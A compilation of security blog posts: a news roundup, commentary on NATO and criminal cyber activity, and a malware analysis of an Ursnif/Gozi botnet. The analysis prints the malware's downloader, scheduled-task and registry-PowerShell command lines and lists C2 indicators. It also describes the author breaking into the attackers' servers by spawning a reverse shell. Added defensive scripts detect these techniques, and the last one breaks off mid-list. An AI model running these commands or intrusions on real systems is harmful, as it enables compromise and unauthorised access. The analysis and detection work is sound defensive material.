B&Q said it had taken action after a security researcher found and disclosed online details of suspected thieves from B&Q stores. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, covering:
  • the first and last names of individuals caught or suspected of stealing goods from stores
  • descriptions of the people involved, their vehicles and other incident-related information
  • the product codes of the goods involved
  • the value of the associated loss

Hundreds of German politicians, including Chancellor Angela Merkel, had personal details stolen and published online at the start of January. A 20-year-old suspect was later arrested in connection with this disclosure. Investigators said the suspect had acted alone, had taught himself the skills he needed using online resources and had no training in computer science: yet another example of the low entry bar for individuals to become a successful and sinister hacker.

Hackers took control of 65,000 Smart TVs around the world in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encouraged victims to visit a web address before finishing with "you should also subscribe to PewDiePie".
Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame but was reported to have fixed the issue anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video about the negative impact of that stunt on the hackers themselves on the BBC News website - The PewDiePie Hackers: Could hacking printers ruin your life?

Security company ForeScout said it had found thousands of vulnerable devices using the search engines Shodan and Censys, many of them located in hospitals and schools. Heating, ventilation and air conditioning (HVAC) systems were among those the team could have taken control of after it developed its own proof-of-concept malware.

Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced Reddit to invalidate passwords en masse in response. A Reddit admin said a "large group of accounts were locked down" due to anomalous activity suggesting unauthorised access.

Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

Action Fraud issued a new warning about a convincing TV Licensing phishing email scam that was making the rounds. The emails use subject lines like "correct your licensing information" and "your TV licence expires today" to persuade people to open them. TV Licensing warned it never asks for this sort of information over email.

January saw further political pressure and media coverage about the threat posed to the UK national security by Chinese telecoms giant Huawei, I'll cover all that in a separate blog post.


NATO’s Cyber Operations Center – Will Russia Feel Threatened?

According to recent reporting, the North Atlantic Treaty Organization (NATO) announced that its Cyber Operations Center (COC) is expected to be fully staffed and functional by 2023. The new COC marks NATO's recognition of the importance of cyberspace in conflict, particularly in times of political tension, which have brought cyber malfeasance targeting elections and critical infrastructure. Establishing the COC is a natural evolution in addressing cyber attacks in a more timely manner, by integrating cyber actions with more conventional military capabilities. In 2014, after cyber attacks had featured prominently in the international incidents in Estonia in 2007 and Georgia in 2008, the Alliance updated its cyber defense policy to classify digital attacks as the equivalent of kinetic attacks under its collective security arrangement, Article 5 of the treaty.

In those particular instances, Russia was suspected in orchestrating or at least tacitly supporting the cyber attacks that afflicted both states.  Since then, Russia’s alleged cyber activities have only become more brazen in their scale and aggressiveness.  From suspected involvement in launching cyber attacks against Ukrainian critical infrastructure to launching a variety of cyber operations to meddle in the elections of foreign governments, Russia has taken advantage of the uncertainty of cyberspace where there is little consensus on key issues such as Internet governance, cyber norms of state behavior, or the criteria by which cyber attacks escalate to a point of war.

NATO has always provided a strong military counterpoint to Russian influence in the European region, and projecting a credible threat in cyberspace is an important complement to NATO's capabilities. Previously, however, NATO had no cyber weapons of its own, a significant gap given Russia's perceived position as a near-peer adversary of the United States. With the establishment of the COC, the United States, United Kingdom and Estonia have offered the Alliance their cyber capabilities. As described in one news article, the Alliance hopes to integrate individual nations' cyber capabilities into Alliance operations, coordinated through the COC and under the command of NATO's top general. With this in hand, it will be interesting to see whether the COC serves as the deterrent it is intended to be, and how Russia adjusts its cyber activities, particularly against NATO member countries.

However, the Alliance still faces the lingering problem of rules of engagement. Classifying cyber attacks under Article 5 is a start, but it does not provide a path forward for how NATO can and should engage and respond to cyber attacks. While this gives NATO a certain flexibility, allowing the Alliance to take each attack on a case-by-case basis in determining the extent of its response, it does not give adversarial states an idea of which cyber activities are tolerated and which are not. This shortcoming serves only to give states like Russia enough wiggle room to continue their offensive cyber operations as long as they don't cross an undefined threshold. It has long been hypothesized that attacks crippling critical infrastructure would meet that threshold, but as seen in Ukraine, this bar keeps being pushed a little farther each time.

The COC is a much-needed instrument in NATO's overall toolbox, strengthening the capacity of the Alliance to deter, and where appropriate retaliate against, cyber attacks. That said, the longer there are no clear lines on what will and will not be deemed acceptable in cyberspace, the more the status quo will remain in place. Once fully operational, the first test of the COC will be how, and in what proportion, it responds to an attack against a member state. At that moment all eyes will turn to Russia to see how it reacts, and whether it alters how and where it conducts its operations.

This is a guest post by Emilio Iasiello

The post NATO’s Cyber Operations Center – Will Russia Feel Threatened? appeared first on CyberDB.

State Actor Cyber Reports Overshadow the Extensive Threat of Cyber Crime

There has been recent focus on alleged Iranian cyber activity over the past few weeks, spurred on by the publication of a vendor report on Iranian operations. Per the vendor's findings, not only was Iran likely behind activity targeting government and private sector targets in the Middle East, it was using National Security Agency exploits that were stolen and dumped into the public domain by the Shadow Brokers group in April 2017. As recently as late August 2018, Iran is suspected of trying to launch influence operations ahead of the midterm elections. The conclusion is that Iran is increasingly using asymmetric attacks, particularly via cyberspace, as part of its toolbox for conducting retaliatory attacks.

The new reporting comes at a time when Russia's cyber malfeasance has largely dominated the press, due to its influence operations and election shenanigans, not just in the United States but in other countries as well. Prior to the Russia focus, North Korea was the focal point with its suspected cyber activities targeting cryptocurrency, and SWIFT banking transactions before that. Iran was propelled onto the scene with the Operation Ababil DDoS attacks against U.S. banks, as well as its suspected involvement in the wiper malware incident against Saudi Aramco.

Some consider Iran a powerful cyber nation on par with, or close to, China and Russia. Others maintain that Iranian actors are much less sophisticated, preferring to implement "tried-and-true tactics while targeting many individuals." China initially led state cyber espionage activity, which was largely curbed against the United States once the "no hack" pact was agreed in 2015.

There seems to be a perpetual "revolving door" of news-cycle focus on suspected state activity, with new reports describing hostile espionage and exploitation against global targets. These reports appear to track the latest escapades of these governments using, in most cases, publicly available tools and exploits (see Shadow Brokers above) and vectors that are routine for any hostile cyber actor (certainly, if a state actor is "sophisticated", the implication is either that its activity hasn't been detected yet, or that its sophisticated tools and exploits haven't been deployed yet).

Between the ongoing stories of adversarial state activity and news of smaller nations looking to acquire offensive cyber capabilities, all indications are that media and vendor reporting will continue to push the "hostile state actor as monolith" narrative into the public eye. Yet, as the saying goes, "if everything is important, nothing is important," and that rings true with regard to state cyber activity. Actual activity or incidents that threaten to disrupt, destroy, degrade, deny or manipulate data systems, or the data resident on them, deserve to be pushed to the forefront, as they potentially impact everyone at all levels.

But theft of intellectual property and state secrets affects a minority, and rarely if ever impacts everyday citizens. The same vigorous scrutiny and analysis applied to suspected state activity should apply to the cyber crime ecosystem, whose nefarious endeavors directly impact the global population. And while there are isolated law enforcement successes in arresting groups and individuals or taking down marketplaces, these have failed to put a dent in a global industry that was cited as the second most reported economic crime in a 2017 report by the same vendor.

This needs to change, and it would be welcome to see vendors with wide and deep visibility into the cyber threat space, who can uncover some of the more "sophisticated" state actors, apply that precision against a threat intent on exploiting everyone on the planet. Some of the more notable breaches have exposed a high volume of individual data:

Year       Organisation                  Records exposed
2013/14    Yahoo                         3 billion accounts
2016       Adult Friend Finder           412 million accounts
2014       eBay                          145 million users
2017       Equifax                       143 million users
2008       Heartland Payment Systems     134 million credit cards

One thing is clear: cyber criminals have proven to be as sophisticated and resourceful as state actors, often using the same tools and techniques. It is disappointing that this category of cyber actor is not tracked as robustly, nor the information shared directly with the appropriate authorities.


This is a guest post by Emilio Iasiello

The post State Actor Cyber Reports Overshadow the Extensive Threat of Cyber Crime appeared first on CyberDB.

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy

Today I'd like to share a full-path analysis, including a KickBack attack, which led me to gain full access to an entire Ursnif/Gozi botnet.

In other words: from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".

NB: the Federal Police have already been alerted on this topic, as well as national and international CERTs/CSIRTs (on August 26/27 2018). Attacked companies and compromised hosts should already have been reached out to. If you have had no idea about this topic until now it means, with high probability, that you/your company are not involved in this threat. I am not going to publicly disclose the victims' IPs.

This disclosure follows the ethical disclosure procedure, which is close to the responsible disclosure procedure but mainly focused on incidents rather than on vulnerabilities.

Since blogging is not my business (I write on my personal blog to share knowledge on cyber security), I will describe some of the main steps that took me to own the attacker infrastructure. I will not disclose the malware code found, nor the malware command and control code, nor details on the attacker's group, since I won't hand future attackers new malware source code ready to be used.

My entire "cyber adventure" began with a simple email carrying a .ZIP file named "Nuovo" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041). Inside the ZIP was a .VBS file (sha256: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which, at the time (August 21 2018), was totally unknown to VirusTotal (unknown = not yet analysed) and was ready to run with a double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to defeat simple reverse engineering, but I do like de-obfuscating hidden code (every time it's like a personal challenge). After some hard-working minutes ( :D ) Stage1 was totally de-obfuscated and ready to be read in plain text. It became clear to me that Stage1 was in charge of evading three main AVs, Kaspersky Lab, Panda Security and Trend Micro, by running simple checks on the Microsoft registry, and of dropping and executing additional software.

Stage1. Obfuscation
Indeed, if none of the searched-for AVs were found on the target system, Stage1 acted as a simple downloader. The specific actions performed follow:
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 dropped and executed a brand new PE file named rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the native Microsoft bitsadmin.exe program. BitsAdmin.exe is a command-line tool that system admins can use to create download or upload jobs and monitor their progress over time. This technique has been widely used by the Anunak APT during bank frauds in the past few years.

The Stage2 analysis (a huge step ahead here) brought me to an additional brand new drop-and-decrypt stager. Stage3 introduced additional layers of anti-reverse-engineering. The following image shows the additional PE section with high entropy on it. It's a significant indication of decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high entropy on the added section
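
Section entropy is the quickest way to confirm the kind of encrypted or packed section the author spots in that image. The following is an added example written for this page, not the author's tooling, and it does not touch the samples named on this page: it walks a PE section table with only the standard library and reports Shannon entropy per section. So that it runs offline it builds a constructed two-section PE in memory, a plain .text section next to a pseudo-random section named UPX1 standing in for a packed payload; the section names, addresses and bytes are assumptions. Anything at or above 7 bits per byte is flagged; packed or encrypted data routinely lands there, while ordinary compiled code sits well below it.

```python
import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(buf):
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def pe_sections(data):
    """Walk the DOS header, COFF header and section table of a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(nsections):
        # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr,
            "vsize": vsize,
            "raw_size": raw_size,
            "executable": bool(chars & 0x20000000),  # IMAGE_SCN_MEM_EXECUTE
            "entropy": round(shannon_entropy(raw), 3),
        })
    return sections


def suspicious_sections(data, threshold=7.0):
    """Names of sections whose raw bytes look encrypted or compressed (entropy >= threshold)."""
    return [s["name"] for s in pe_sections(data) if s["entropy"] >= threshold]


def build_sample_pe():
    """Constructed two-section PE32 (assumption: not a real binary): a plain .text section
    plus a pseudo-random section named UPX1 standing in for a packed payload."""
    text = b"\x90" * 400 + b"\xc3" * 112                  # 512 bytes, low entropy
    packed, block = b"", b"constructed-sample"
    while len(packed) < 1024:                              # 1024 bytes of SHA-256 chain output
        block = hashlib.sha256(block).digest()
        packed += block
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                  # e_lfanew: PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<H", 0x10B) + bytes(222)            # PE32 magic, rest zeroed

    def sec(name, vaddr, size, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, raw_ptr, 0, 0, 0, 0, chars)

    table = (sec(b".text", 0x1000, 512, 512, 0x60000020) +
             sec(b"UPX1", 0x2000, 1024, 1024, 0xE0000040))
    header = bytes(dos) + b"PE\0\0" + coff + opt + table
    return header + bytes(512 - len(header)) + text + packed   # pad headers to 512


if __name__ == "__main__":
    image = build_sample_pe()
    for s in pe_sections(image):
        print(f"{s['name']:8} va=0x{s['vaddr']:x} size={s['raw_size']:5} entropy={s['entropy']}")
    print("suspicious:", suspicious_sections(image))
```

Read the result together with the section flags: a writable, executable section with near-maximal entropy and a tiny .text next to it is the classic shape of a packed stub that unpacks into memory, which is exactly the case where static signatures fail and the sample has to be unpacked or run to see the real payload.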

Indeed Stage3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload, in such a way that many AV engines were not able to detect it since the signature differed from the original payload's. Finally the unpacked payload presented many interesting features; for example it was weaponised with evasion techniques such as: timing delay (through sleep), loop delay by calling the GetSystemTimeAsFileTime API 9979141 times, BIOS version harvesting, system manufacturer information and system fingerprinting to check whether it was running in a virtual or physical environment. It installed itself in the Windows auto-run registry to gain persistence on the victim machine. The following action was performed with the background flag set:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))
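
Both Stage1's download-then-schedule chain (the bitsadmin /transfer and schtasks /create pair shown earlier) and the registry-resident PowerShell payload above are living-off-the-land patterns that a process-creation log (Sysmon event 1 or an EDR equivalent) can catch. The following is added detection logic written for this page, not the author's code: the process events, pids, parent names, paths and the example.invalid URL are constructed, and the remote URL the real sample fetched from is not taken from this page. It tags a command line when bitsadmin writes into a user-writable directory, when schtasks points a task at a binary in such a directory, when both appear in a single cmd.exe invocation, and when PowerShell passes a value read from the registry to invoke-expression.

```python
import re

# Paths an unprivileged user can write to; a payload dropped there and then
# scheduled from there is the combination worth alerting on.
USER_WRITABLE = re.compile(r"(?i)\\(?:AppData\\Local\\Temp|AppData\\Roaming|Users\\Public)\\")

BITS_TRANSFER = re.compile(r"(?i)\bbitsadmin(?:\.exe)?\b.*?/transfer\b")
SCHTASKS_CREATE = re.compile(r'(?i)\bschtasks(?:\.exe)?\b.*?/create\b.*?/tr\s+"?(?P<tr>[^"&]+)')
REGISTRY_IEX = re.compile(
    r"(?i)powershell.*?(?:invoke-expression|\biex\b).*?get-itemproperty.*?\bHK(?:CU|LM):")


def classify_command(cmdline):
    """Return the technique tags that match one process command line (empty if clean)."""
    tags = []
    if BITS_TRANSFER.search(cmdline) and USER_WRITABLE.search(cmdline):
        tags.append("bitsadmin_download_to_user_dir")
    m = SCHTASKS_CREATE.search(cmdline)
    if m and USER_WRITABLE.search(m.group("tr")):      # only the /tr target path is checked
        tags.append("schtasks_persist_user_dir")
    if REGISTRY_IEX.search(cmdline):
        tags.append("powershell_registry_resident_payload")
    if "bitsadmin_download_to_user_dir" in tags and "schtasks_persist_user_dir" in tags:
        tags.append("download_then_persist_chain")     # both stages in one cmd.exe invocation
    return tags


def scan_process_events(events):
    """Map pid -> tags for every event whose command line matches at least one rule."""
    hits = {}
    for e in events:
        tags = classify_command(e["cmdline"])
        if tags:
            hits[e["pid"]] = tags
    return hits


# Constructed process-creation events (hypothetical pids, parents, paths and URL; not the
# sample from this page). example.invalid is a reserved name that never resolves.
SAMPLE_EVENTS = [
    {"pid": 1201, "parent": "wscript.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer job1 /priority foreground '
                r'http://example.invalid/update.bin C:\Users\JDOE~1\AppData\Local\Temp\svc_update.exe '
                r'&schtasks /create /st 01:36 /sc once /tn upd1 /tr C:\Users\JDOE~1\AppData\Local\Temp\svc_update.exe'},
    {"pid": 1340, "parent": "svc_update.exe",
     "cmdline": r"cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString("
                r"(get-itemproperty 'HKCU:\Software\Example\Blob').Payload))"},
    {"pid": 1500, "parent": "explorer.exe",   # admin pulling a patch into a system directory
     "cmdline": r"bitsadmin /transfer patch /priority normal http://example.invalid/kb.msu C:\Windows\Temp\kb.msu"},
    {"pid": 1600, "parent": "explorer.exe",   # legitimate scheduled task under Program Files
     "cmdline": r'schtasks /create /sc daily /tn Backup /tr "C:\Program Files\Backup\backup.exe"'},
]

if __name__ == "__main__":
    for pid, tags in scan_process_events(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

The two clean events matter as much as the two hits: bitsadmin and schtasks are legitimate administration tools, so a rule that fires on the binary name alone drowns in noise, whereas anchoring on where the payload lands and what parent spawned the chain keeps the alert actionable. The registry rule is deliberately narrow; a payload stored under HKCU and fed to invoke-expression has no file on disk for a scanner to hash, which is the whole point of that technique.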

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2
C:\Windows\system32\SearchIndexer.exe /Embedding
taskhost.exe SYSTEM
taskhost.exe $(Arg0)
C:\Windows\System32\svchost.exe -k WerSvcGroup
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2
cmd /C "nslookup > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\WerFault.exe -u -p 2524 -s 288
"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"

Stage 3 finally connects back to its C2s once it has checked its own IP address. Two main C2s were observed:

    • C2 level_1 (for domains and IPs check the IoC section). Stage 3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls collect information on victims and deliver plugins that expand the infection's functionality.
    • C2 level_2 (for domains and IPs check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to hand over stolen information. It is Ursnif/Gozi and it exfiltrates user credentials by looking for specific files, grabbing the user's clipboard and performing man-in-the-browser attacks against major web sites such as PayPal, Gmail, Microsoft and many other online services.

So far so good. Everything looked like one of my usual analyses, but something caught my attention. The C2 level_1 had an administration panel which, in my personal opinion, was "hand made" and a pretty "young" implementation: plain HTML with no client-side controls, no clickjacking controls and no special login tokens. In line with Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and collaborating with local authorities to shut it down, gathering as much information as possible in order to help federal and local police fight cyber crime.

Fortunately I spotted a file inclusion vulnerability in the Command and Control which got me in! The following image shows a reverse shell I spawned on the attacker's command and control.

Reverse Shell On C2 Stage_1

Now I was able to download the entire Command and Control source code (PHP) and study it! The study of this brand new C2 took me to the next level. First of all I was able to get access to the local database, where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (in Cyrillic) in it, in line with the Anunak APT report made by Group-IB.

Command and Control Source Code (snip)
The following image is a simple screenshot of the database dump containing victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database 

Additional investigations on the database brought up new connected IPs. Those IPs were querying MySQL with administrative rights. At least two additional layers of C2 were present. While level_1 was weaponising the malware implant, level_2 was collecting information from victims. Thanks to the source code study it was possible to find more 0-days to use against the C2 and to break into the C2 level_2. Now I was able to see encrypted URLs coming from infected hosts. Important steps ahead are intentionally missing. Among the many URLs the analyst was able to identify a "test" connection from the attacker and focused on decrypting that connection. Fortunately everything needed was written in the command and control source code. In this specific case the following function was fundamental to get to clear text!

URL Decryption Function
The eKey was stored directly in the DB and the decryption function was quite easy to reverse. Finally it was possible to figure out how to decrypt the attacker's test string (the first transaction available in the logs) and, voilà, it was possible to check the attacker's email :D!

Attacker eMail: VPS credentials
Once "in" a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !

Attacker VPS Environment

Sharing these results for free would let vendors (for example AV companies, firewall companies, IDS companies and so on) update their signatures and block such a threat for everybody all around the world. I am sure that this work will not stop malicious actors, BUT at least we might raise our voice against cyber criminals!

In this post I described the main steps that led me to gain access to a big Ursnif/Gozi botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on the attacker infrastructure). The threat appeared very well structured: Docker containers were adopted in order to automate the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up by a criminal organisation and not by a single person.

The following graph shows the victim distribution in August 2018. The main target currently is the USA with 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims in August 2018 number several thousand.

Victims Distribution on August 24 2018

During the analysis it was interesting to observe that the attacker was acquiring domains from an apparent "black market" where many actors were selling and buying "apparently compromised domains" (no evidence for this last sentence, only a feeling). The system (following picture) looks like a trading platform with a public API that third-party systems can operate, much like stock trading operators.

Apparent Domain BlackMarket

Hope you enjoyed the reading.

Following is a list of interesting artefacts that would help to block and prevent the described threat.

  • 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d (.vbs)
  • 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041 (Nuovo
  • 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c (rEOuvWkRP.exe)
  • 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e (Stage 3.exe)
Windows Services Names:
  • WSearch
  • WerSvc
Involved eMails:
Involved IPs:
  • 198[.]54[.]116[.]126 (Dropper Stage 2)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]212[.]47[.]9 (C2 level_1)
  • 52[.]151[.]62[.]5 (C2 level_1)
  • 185[.]154[.]53[.]185 (C2 level_1)
  • 185[.]212[.]44[.]209 (C2 level_1)
  • 195[.]123[.]237[.]123 (C2 level_1)
  • 185[.]158[.]251[.]173 (General Network DB)
  • 185[.]183[.]162[.]92 (Orchestrator CPANEL)

Involved Domains:
  • http://englandlistings[.]com/pagverd75.php (Dropper Stage 2)
  • https://pool[.]jfklandscape[.]com  (C2 level_1)
  • https://pool[.]thefutureiskids[.]com (C2 level_1)
  • https://next[.]gardenforyou[.]org (C2 level_1)
  • https://1000numbers[.]com (C2 level_1)
  • https://batterygator[.]com (C2 level_1)
  • https://beard-style[.]com (C2 level_1)
  • https://pomidom[.]com (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (C2 level_1)
  • (Orchestrator CPANEL)

*Actually it was not the whole network; a couple of external systems were investigated as well.
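As an added example (my own code, not the post's tooling and not anything from Yoroi): the script below refangs the IoCs listed above, sweeps some constructed proxy log lines for the listed IPs and domains (including subdomains of them), checks a file hash against the listed SHA-256 values, and flags process command lines of the shape seen in the sandbox trace earlier on this page (cmd.exe running nslookup/echo redirected into a <hex>.bi1 file under %TEMP%). The proxy log format and every log line are constructed for the example; only the indicators come from the post.

```python
"""Refang the post's IoCs and sweep constructed logs for them.

Added example, not the post's own code. Log lines are constructed.
"""
import re
from urllib.parse import urlsplit

# Indicators copied from the post above, still defanged with "[.]".
DEFANGED_IPS = [
    "198[.]54[.]116[.]126", "195[.]123[.]237[.]123", "185[.]212[.]47[.]9",
    "52[.]151[.]62[.]5", "185[.]154[.]53[.]185", "185[.]212[.]44[.]209",
    "185[.]158[.]251[.]173", "185[.]183[.]162[.]92",
]
DEFANGED_URLS = [
    "http://englandlistings[.]com/pagverd75.php",
    "https://pool[.]jfklandscape[.]com",
    "https://pool[.]thefutureiskids[.]com",
    "https://next[.]gardenforyou[.]org",
    "https://1000numbers[.]com",
    "https://batterygator[.]com",
    "https://beard-style[.]com",
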